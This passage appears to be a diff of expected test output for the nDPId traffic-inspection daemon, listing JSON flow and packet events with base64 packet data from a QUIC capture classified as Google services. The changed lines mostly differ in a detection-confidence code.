gl\/fiQ\/Mz7Rf\/0\/xEHpiGjimSZGMLJKt8tbPUkf1Doy0L2PCwY6LPbySmFk83DrXfORYqZzQC5aRkTc2HeUqrMm4bElbKJ5gKch3VNRryw25TpUnRtQFu9IMWDE5dX\/3mWizx7+qMJm47Fyoex2QVEdKtHErz\/i5jbltyKP+JlYh\/5iVhFxWpfjDpTOkH+CE\/A7gJzr87sNP+7VuTghxvarGALGRQvWB3CXNIrBOCA9jEhQerKbB8C97DJMm5tcWUZ65E7AYZouY8+zkDggzBLI+0JJ05RIaaHlApiwpsWJ2zl6F1m9w14xWaghs7jZgtgfJEpGiT74jl4pf2klaE21HmQ3jnkf6AGhbgdZBQmCO4EIpeWJZsQhwGl5VQuea9a84+ee5DEZk764Ux2ytifgViB44NxlhtfksBdQI6G+PUXELugH4wQ6SukmCIBACuFIfzQbiKGjpnRUkS7AmxTtYPrsIuSjFIrLSGd\/5Xekm02vVOPCc7EG+Woa7OletCxnuTQjLX8oheX0o2Op+1dBXeNai8Q63RlSaVEOBjEiXQnmJ5lR4kLHJAKgnnUly9\/g84JyqUljiN\/e8uABODq7kynlT0o2IN5CHpN2XfhoXZlxt2HiDrqvNzSKO3CpTZnnkJeJtK9cjSU1XxfkGr1TK+WrsxaOx2y4S6PIiErYJnObHfsCoROfZ
B5v6WjVW4TwLRypWRXulBOZly5TnbMAqCFsdN0gy6amJt3ngyiI1muUKlcYOXXmBVBPpum\/+c5TkiBPy0hZUTn3PK8vRrELBxFuvPrWR1GEbulof1jbR58Ncmb0rjGewwYSLgqvfw8fWuUbbODAYVLX15bmDoErj\/57wyWqkBS8kUoD3JZecSRs8Aps02NKyynCKHOlNpc8OBgCA4Ad6xJZK3IyyURTyz5JvyG0vAoHB8Htl9cCeXJkHl+hbzHpVtzHZa9PuVxTwrw5ZpWXJ3D7gYDf3YjByo50t9uNuwO1TdW6VEIoQ2YFWco6RoRPd9mEfRhGyA\/HMeXm4nHmXXkUxD0lWGhQ1X301intynkww+5gju+t6izkuTyIR+es3wNgXF3uDXXchyNcpEgdq6KXfVdg\/FtdXzMb3o20tlnu0aGTS9Ke8r2K9x5Uy5E4IMaNx46xDz\/FHeQCHMCFloD7HC0iGeHQTjamzHYw9Q9cx0UPZlEZjKGZ\/W9mm9Rh0pSLgVkS1htsYD6Bvo2h8czyqOaZf"} 02306{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":64,"flow_packet_id":3,"flow_last_seen":1621486386389,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621486386389,"pkt":"AAAAAAAAAAQAJ0huCABFAAViZZpAAH4R2k80uxSv0OWdUcLYAbsFTowYzv8AAB0I+aKrjQG3wPMAAEU063sPCo4ozMPxlUj\/bSPtY3+CzlLdcC7kUprewEjKm2OTMB65C2RpyTFK0qHd1UzUnN6U5dQGGKmwgsbIXIKSBC7aC9lk9\/7KSXCk70eFVpjOtIDpiKUi8vVDCcfV6kRbykQ1UG60rnGaessWOlmJYYUYrFTLfQgo1LVYDsFKsPtJ1s1kupvZUz7DtsLylFS2l34GkqtIScglkyae0GI8mViRVebeilzlJSvddjOZxdAXXrNZAwRXdoffLloV5HtcoTQxqkR0GAPQdvrWXk+SMlGx\/W7Ne49MxOoYqcb+ZEW\/cA0RMhYOyvvzwyDA6S9WR2IZmDOEetLTQcoqKQrcTga50K8d4JAO4kVEikYFtr5Bm1z+MiARlDwUJIa24qTqLJVIo5iKqG52c5DO3tsvK0vzd8pSllrOHA6f\/I4wQDPyPJtMgg5O1ZoG8De8l3r2ufSRHsnJkEpyqWGF1+ijD\/7lBI\/5nWTPn9fBbdQQQkTlCH2+hn3jyqGiasIwS76cDfQW7wvTATHGizCtUCL9RDngXJ4m60+cjB0gourDm90bfqwSQs1xt55IkE5JsBrjydZPyipe0uhIjm4KZxuvhAjYi7daB1ce\/\/+407cCf+sxxL7CWqTVDAtgj6KFZbP4hnyT9ga4vkmC3\/t2CtLgFM4\/LEuF4nmXrGayZvHNNVuso5WMvbM4gno9LWsv2kJV4dX1TThhLd\/wIxSNzjl0dXSOBZ7wgJEHEnznJuFVstXb3tQcV7X3RP\/hcXpU9XjjFPCV5oo1sQe64QtneNkxV2yjvvs4fEGTk+zfZAnlMw\/iFw5VrPsMS\/wDar7RyJvWTPrIcoFDMu0pl6zkP5Al5BXrxcNMZVEAv6FlHk7RldT5vteKHFUD2EG202+PzEtOTPlmqNG6eE17A10kl4\/4bK9PAjRlBls
dbWm59jtIwieLuyVkY3xNNoXmkXmw+HTfj8L6cgMab+8MVWKD6X2FNJX1Hh4plar7gQs1wBHs\/50jh9TX5uIoGdQRaAkCjse9rKdwxS\/mQ3AZwSCeTLDSDZ7HNKOkFvE4XF72wS8k1jEs8CQLMd5eF7YKEIwhKqSRCTAxxeIp83q7tXfO3G8oxX8DNBZyGPdzHTcD2B2+WzAACX+B3mJrQJ47ogTtd7hRxPzmVNoKxW1cJA2W8sth9y2x0M4tQfFNCg+y7Hjysh4guq6xCuiVT5xotwMwPSDBGNIuXj+rftzi7znrhrNAbCSXiAYGtGnmHBOghmDMitk72DkuK88UEA04IW2\/8fbI46r27QDrpS7pjckWTOaGJMfuh8JgHCaU9F5gWqtRhso3KChbMMFYhYXX8heyFp2QTjtSXCvmSvOb\/P4Saj9keRyVu6EwxUD\/Wvi1CQPZNexfLJTr4d0fY2EFznG9mLwUFqLk8x93VjpNxh9mUDOT+9FkN2OUAwfOdunZk+S7EQYfuz58Zq50dfTTQ4ytc1corJ8ZnuRFp7bcXIyr+r\/g0rxcm55mxTcduuOI43k6A\/u4kxcszhmg9OmUhSIdiyIqrI4cTDkvXweJOztAO+v1eNUC8H68zvSWSCyYfBS09v+biPzskrJYVcIdvRbgzNi1MALIo64umFnfoGW7g7tdRnTTtUaVJ7SjjCNftNOmI+oKGp0G6qA+uKDhFNzBEwpKt7nPh7uh8czyGQ5haYxO+MQIP6acb8ITWfq7ZBDLBK87VY24JBoDq6EX9\/nCN65uCe1Ka7quGr3dV6rIOhhe19uIvRjiUm2GbcXkIV4PPI8eo8VJ"} 00603{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":86,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","packets-captured":86,"packets-processed":85,"total-skipped-flows":0,"total-l4-payload-len":114750,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":64,"total-detection-updates":0,"total-updates":0,"current-active-flows":3,"total-active-flows":64,"total-idle-flows":61,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":280,"global_ts_msec":1621488172593} 
00635{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":86,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621488172593,"flow_last_seen":1621488172593,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621488172593,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"208.229.157.81","src_port":58337,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02311{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1621488172593,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621488172593,"pkt":"AAAAAAAAAAQA2lQ0CABFAAViZb1AAH4R06SfdbB80OWdUePhAbsFTly0xv8AAB0IIYJbjKvcKZMAAEU0Tezktqb5jgj7Ctco9B1gEgebhfTklfJiWUvzvzXVx1e1KCfmB0CYkpgvAEMWkCN96k4yxgEJhItMoJtLxBJKjThyVwVNoJs4osfVKgvW27jc\/\/cMoYfkmt0BcMTE+S832TZqo7DcoxbJ4SED5T\/fELYc1YonSB\/W876e8faG5n9Z889N6aEcUSpAR1NRv\/LUdTkKc80E8eLY0MsHFlrDxy6CZovHJ1EZPsnxPU3xmuA6PKcoVZk5E7PnwPJWVDykRwGVsj3\/uqwsCOxMLScufsvGchEffztJ8Mjpf1xy0Hks4XzejPQm1+YDaRsdxSWXt45SRLIvo\/c6h5H5fCX4yZ2dh6e24j40pDTautPP1E4KkxfA2AopSrSKSf1UiAUXmQWbN\/kgMU18r7h5LyzlAMKuX8\/Ay6yq9jK87jtj+MIImpIKoL9MeHVOS5lygsoTWIqqynPssiNY6xC8pyJX6Ub4BO4F+0CReGOoAESo+zj9+lbUqbeb7h2ZFGxadMW1CyyleoZNnWar6Hz0+sxBH9qRVZU5Heht2DjEc+6NEcDLxV5EaOX94GYWpZ5FR0EacC16CngtIJvVS2Vy4VHEXkHxRQ\/E8+BlBf48jcRRSu6r+V6GHpQVxkfvTm75zRbp227tVm1MAOmDC4ptEOe+sdRM+KrFAvaHe3o8pZCxK\/7aYLbotm\/RZjsivWCu89Cmlg0uVcL6Bo5BPfMomqOupt99ASfgdLdPTXGKZLuwp3GgyZeH9wnyPMM2+7Ggpa0RPG\/l2tSy9nrzzP\/MgL6CqbtRTpr2wbBNd\/SlbwIb1c6hehW1bLPfXoYMcr0kEetxg6OaH
byEdd\/4Ggz4SeyO3GItOwerR7WYWNxOmqs9taE9J\/PhK6NBDsXc5h1tgICSKag9AJoKaM9ovRC5UgfrYrqgqF4SuseIOZvAOlPyRcpmSKooL1mlS9PJzoeolBQ4Q6A6x\/nvmxc72I7syFXnB044YwfE2N774LUPLvvOLCg6Im9ZhCD7p4F+CscFU38oxt25Ays+maqiXnRw3mGV9KfMCfeBg8fWwb36KsISX3CI+1rfMDf89m\/pkzSajfjHt8k3vTCGPK5nVGcTDfOSB9CGZ6SX8cHmOTNUvoBI7fCfE9\/8Ngy8sawBjS5kemk2pVar\/Qjc6ZWFlikqXDEg6gI3HlFx4rzttRuJpbdSVX3pGOgGMXPyrCnFjqgDg3Cu2Y3VVoKD9yvfxYbTeV+segTGzJ9TpKpIQ7l2mOQyzexa60jhCdWRVqP2SmFZC650dD3TPV5qrCw8uvxv\/Hwr9JxUCKr4vZ4MNIS1Qme31hh9cKk\/smw6+dP8LKPbRFjyi5hKalZAn2oi12OsRGCRrT+CZhgIm3EsqKl4eDAmzdpgh\/Xxnln2oigZwNL9aNU0vU6Ri2z6ptRUiK3E+ULse6j5hYRaWYH1k1ExTT3ucG4D4c7xsf3YTntqY+KTDBBG1sDbHwo3em6WCb7WG7xc0voquwvCfNxaCk3bAzckSDEa86uyeuxhABsH12KWz4kITx5OwWU+lhxFgwus9PGlUh3+t363ytP+xsR98JT4AH\/MTUvv9IyRtjule4mQon8WEXtnJYqcNEh5E2UIF8gnaLnV+hrmX90Z\/weVChYKzF3NgPl9LTYOKXHKx6sgO+65G03KKrg6J\/G\/Y28JZ444EBiIz1Vv3DiM9J4DLhOb6iB9GptUjPIDobrRPDlIYVvrbFerCtsjpuaVI\/H1eUosHYVIRS78lDJZULDLtLIu6mDP+sVB"} -00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":86,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621488172593,"flow_last_seen":1621488172593,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621488172593,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"208.229.157.81","src_port":58337,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"clientservices.googleapis.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 
+00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":86,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621488172593,"flow_last_seen":1621488172593,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621488172593,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"208.229.157.81","src_port":58337,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"clientservices.googleapis.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 02311{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":65,"flow_packet_id":2,"flow_last_seen":1621488172891,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621488172891,"pkt":"AAAAAAAAAAQA2lQ0CABFAAViZb5AAH4R06OfdbB80OWdUePhAbsFTm8Pzf8AAB0IIYJbjKvcKZMAAEU0+s8UmerPzJNPf2vFFmMIxXzWOI8+nlMJBqPIX91\/fJ41T6FVJdyz55\/AUFcKq9ZZyk2YP1zAlqFolkkHkO3Xi8aifTMn51fKa2wn5Crg\/NezDOPCbLX1Xw15fkvxcQMtx4EhBp9vvHyapMkXhNDJRu9RXfR+jrCal+s6uozM4Bh\/jgsteWhVYvFutpLBcFpAsACOZOXcc76QRT29xwiI2HkTMraeke6E6Elw3fZ8\/x0cjiKmAdvj\/rbQ44niXNogWCExDiid2qXxV\/VGMqrcCQpdoi78teOlLV1cLZCyKK9Gz1YT8+74zc3fizqw3J2xo1b0u2CHknZb06C+uIl7e5NEZUm2WVVu0v4iXHKkXSNY51UoQsVSs9xffcs1c0GmB\/wh2f7GXXXrVNip8rLBByPg2DJfrk+PoxGJ3J1kwQ1qDmOjB+UdN6fAUDfkxumO+fJw5izefocSJigy5LmmrjyewC9W+CDD3xJ\/cFzJCoFgSyf95fZ38+c\/H2rJBuKCVW1pdiho
\/NBYDfaWuy5vckCjxN4xZv2JHxLWOVrRbclHG\/W4SWRZQP56mfXat0F0uG7PtJ8CgwXQ7NSbWtihIdZ43Ml3L0hioaK94VzmiCutO2T6s1ZqHQABM0\/PLZwtIpO3lBVHxkmK8czxVU2bfhh8Bd2aiAShWCZbWF5jU8EnQsfhGgHyekqxaLTahPiDCOg0SBmkozlENpi+0yMs2D5IkWhpyqBstkxFFNgybyAV5r6Lhm7JHwq3ZfXZFrRSuhRUAeCOh+NaYs7welFWYGPQBos2AQTRUC3NlRnOAtgvnKyVKOW2QjRgtqEzb4WdTL0bbNQ2FQpc9GYYE\/flJ2uoIFGQuv3JETxQMq9QMyae75gPV\/Bj+xdFH57XdiAsHKWYX7zqDRuKxKMuekYDDstuaLV4VDQc6MVZaJFii0GEv\/SupV\/58ZZpNHFEEyZHJzfkH2tbuh5MUuS5PofLOSzfTRmu+vMjtYQ209SICOmLVwPZ8u2AGrlFW2EqkZfbKI9erViZ2Unn0RZM2Pn+Wgst22Sb5g8wjh4wiA9weFHLORi1vWiHZkYe2\/BL8j1rJOY+xONNiXjbzvs+yXxIs+kJcjMnf6gyaovRvL\/c6j4rDv+KS6KHyF5Hju3yVQObDWEk+4j7PY+PaxYyvjYZHI36l3YksknZbaOMlMvl6nVwtU\/k8ACWq1HuEpfSG1UyrshCoDlTkhmlMZlMD7qdLPEuFj6m4MSRbjzW3hQa\/qxU3T2Qgki9LeSxXGYHJB9FXzq8yIQ0vOgWUQBxW\/4B0BqwQlgEeI27byi7vI9kmpC7Qou2YWyfsYTI9GGARRW7m5xU+maz8hHKd9KDfpthCymON5jJnYSptI3eug5aoGebEfP5bAslTyRCDFlm2Q8uSYfqFoNXujhc5z8WRPjLGKq59LGiZiW\/yB6lByCmmdTIYea2rAoFVqdYtPOdeFLrrKWhD5CpJEWImL1e1iTCT+E807\/aKY4QGP2WsFpn7d+gLCr5xQK6CXuhhNH9slGRzedlepwRyZh\/3i53f2a3Gl9RXi3N64p6CoFGMqiF8smMYblBOriOhOrEkIll8SQrZsnx81mclM\/4eF2UVnsQIp5n07HaGrEdZCT8fSndvbKLHO\/t6xkch5Ixv6BouSjYWklnDUEpJZz+jrQFC2wuRvZqOy6nf4lhu\/4E2kmpv\/MgYvFMVgKwJlJICexzBQbnudDHL7qYGQXGmi1uMwd9ljoVOFUJTpmzZx2wQtELSWXl0AWl"} 
02312{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":65,"flow_packet_id":3,"flow_last_seen":1621488173506,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621488173506,"pkt":"AAAAAAAAAAQA2lQ0CABFAAViZb9AAH4R06KfdbB80OWdUePhAbsFToJhz\/8AAB0IIYJbjKvcKZMAAEU0qqZ2\/TuAubKLOjJ81oMaQxBMQ+\/6Vw7RaaKNzHvrM1NT+orB\/NmJSKxGxbSKEavrqUsSfkdDyIeYu3DeilK2GpCIubh8xfR7tcGDs399cvt3jBHRuuErN+rqniq2AF218asFOb+4ZGYSRPk5EdOKXsHpM4jOO5Xn\/0nKFyhG9EYHqVO8+pB7f6yczQlCMtDLF7lTT1tq0Xx5\/GJD9G0tCnOfX23fuY+en2OxpF0Q0PgXWtcsqYDtzTUWjmLH9BCjSI2kYYeo50ocz2WBWTGUXpoqJ9iYBz24Ky503DT5070a\/wp9cUFkXCNTV2eHv4keTxj9VvDD+Oi66PuHhOmSDrAohpZ0xItBmFaH47riNVmR0f7T0zfIhWCnOcjR4SomjPDBWcliBXMeSR14Qltlyc2kedQT7ZLDVfShl8+u3uS+zP8eyCq9nqBKQBMDF3cRxR6L9pGoibjSnh\/b6YBpwD7F5mcjWWjHHKVaxCEGQReuxjIGxxYeVTuCdqjXIwa0Izsll9LqeaEweLCNX8z\/\/CZA3pA9mivC5xkaqkyX9Ux4LPkC+WULQxMZBpEoE79XgttU5rCxCA8WEYInE4gplnnN12fNrAq7oK+ddinTvJs0+jBDZTCzpU5n0HC2WICnWxzQMAjhLIg\/BIVwHRaFAYw4Do1nKdRZ3+Sk32nhis1tvF4rOVrl8+QuSs+KqMidgjtjP4SWdcX\/X8u2OzpzpdBsJdPiiV1fZ6dss\/sv6xMaQ9B5Gojobr89aeGChzGbohXQd5y+iFUBt1VsbEb5dhDDvDWxob504mm+e8jfdDuh3GB0n6pHxwhoVSFVO0mUera+adQA3\/opY719kwV\/jWZYsfN5slbWhOML1HIQ5QADeewjbYw54FRDTOuqIEIQbZ9eM\/tKlt3HYJQncTGCiHf2mm1doGvuzgFM0BmQfN90m\/alC4XLQIUhU8uiZL5CekhxJSUTgbyaSPP5TKOnCqgDTVfMKVsJwC7ux18\/QNJq+Ao9ADSnhw1UkHTxFxUqNTpfucOEexD48oLEIifV\/GQ5Y7cYnaT6cfEnC0SeITsljquMY3Vr79yR+QT5dEIT2QkhSvvCGGW\/JaK9qcRkCLlnq0aJaQUiowTpWicqExI5X+zS+4f9cimXTb1tdSX+O2UlnWTkunOyyMLCdR06IG83Z2X7B68oZ5TXGb1vA2xmZqHXtvssbw5o3OZ\/M9ztrfZLxtw7s8Pk6oU7LSRvamoE2v0G9pXaI5VrazOyfxbUNSpQmwOmJe459lT4Qg\/CnThmMtCEXTzATibzMPGsrla5NWj1q5gr9q3cviQjSSPHCEIDuTp5wrZMCiLpv2tpEgI1rY246nmnSiDYby74PkSaGM0LCk4dDOKWAhuy+SIWuf9+uyIIqBmolfwWUmGX4ONSUzWAjAWNs2YzUhcxe+89BPXzlrVFcxvo28wdQF4wSVKN2VK78RJt0mrleR
\/3P9HW80AETxSMIAaEoEcHDp\/lwJVPxAJL45U914u61nAp6JUN9jjimYNkNOeCLWI6j0GQS0Xi6UYYe2RkTF7sTCWShKI7ICgWwC12IaNxcPgDzh7ZJ5NhRgId1zLe42\/4\/EcfTgM0eAjGVTGUnREGIUVXj90QTn7l3oLmTduz\/OspCcyyktZYIOsHK+50LEMXLZUzKDQljXLHjWdmlr2k+azMseDn\/5zu4+kAWTW9dTENdlnZVBC1XVkmAgizBXmK\/6e5hjHzv+Y\/zyTl7BZXDbv8FjjkJrCJK9tXBh9Xzwcqbagr"} -00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":90,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621486316206,"flow_last_seen":1621486318293,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621488174706,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"208.229.157.81","src_port":50588,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} -00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":90,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621486385474,"flow_last_seen":1621486387592,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621488174706,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"208.229.157.81","src_port":49880,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} 
-00741{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":90,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621486369476,"flow_last_seen":1621486371605,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621488174706,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"99.42.133.245","src_port":61089,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} +00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":90,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621486316206,"flow_last_seen":1621486318293,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621488174706,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"208.229.157.81","src_port":50588,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} 
+00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":90,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621486385474,"flow_last_seen":1621486387592,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621488174706,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"208.229.157.81","src_port":49880,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} +00741{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":90,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621486369476,"flow_last_seen":1621486371605,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621488174706,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"99.42.133.245","src_port":61089,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} 
00603{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":90,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","packets-captured":90,"packets-processed":89,"total-skipped-flows":0,"total-l4-payload-len":120150,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":65,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":65,"total-idle-flows":64,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":289,"global_ts_msec":1621489064431} 00633{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":90,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621489064431,"flow_last_seen":1621489064431,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621489064431,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"198.74.29.79","src_port":49867,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02307{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1621489064431,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621489064431,"pkt":"AAAAAAAAAAQA8lpWCABFAAViaqxAAH4RWVOfdbB8xkodT8LLAbsFTrHDzf8AAB0IkZSau0whIqIAAEU0rkimartPZo3XhAXpouf99lPyA4vPJfhF3sf1D80fQsd6hKzlDSeSsZ1KyRiDq23Zc4xu7yZSamgh8nd6IyVTF7B8MySKONiiaOY7dBSEC0bp4AebJ3k9Uh+OOZq1GyBDHDSVQ3BCXr14N2BMEqsgITpqPo+Z792Msbma9ODtfxa1MtHVKjQ15xkDF4+So8i\/fjbAfOViRfLKHxw\/jO95gtHmKOmNKHB+nvq+muN+iHIbHDxcpnXnO6PuxaBm23tYOT0PH9TUnUOZWqCNY2p9QM7ZIgufCDLh8c4C\/NFv9tZwBa9qhWLW6ebYQbaildftHqg7LB2KmNDXg69lhWaxLtl4+vEH9U9m2NQrOHQ8oFyTBFFkoewhMmDe5wHcaBJAO22wMqllFBpPnpzOCMy\/DJyHizv1if27VSaBPv3oEozht0\/dit4QAWrhZlnDelbE2T\/59x3uh6ABXgAV0b\/BloP7H5Pv9njEs3lHJOz7dFzr8iIjfB3B+OpQ5iUcuq9FxMhcezvIQOTkxNLORi6FlvB2GNGwRg+rukfVzwMeVbcyJ4bxFt9mc1MOr\/FkhpLL7F3QAjXoJvtrBiJncMoLXPRxAcMFUlowojaTi47EoeY8wguEuf7S86c2o+PQ1edefZeGvN87Fj\/fTTENh3Fn3S0OsYOmjnoXwQbxlBLOKTRd2KGqC3a92N1etrZBlnzvhACTKJeh8oRfYYE4DO+7CgxV4zH9ZFi7iaFktcfGl8Qu0FK6cb5HhSbMXyyvDCuCWYLd0ovyzFo0PNVt6yeC7MWIrgENNxCpTwOvjKs0+xlEsZf\/950lvdpBdkdhcTjSV34d2kg0KiEp6WKDoRhKAAnK2O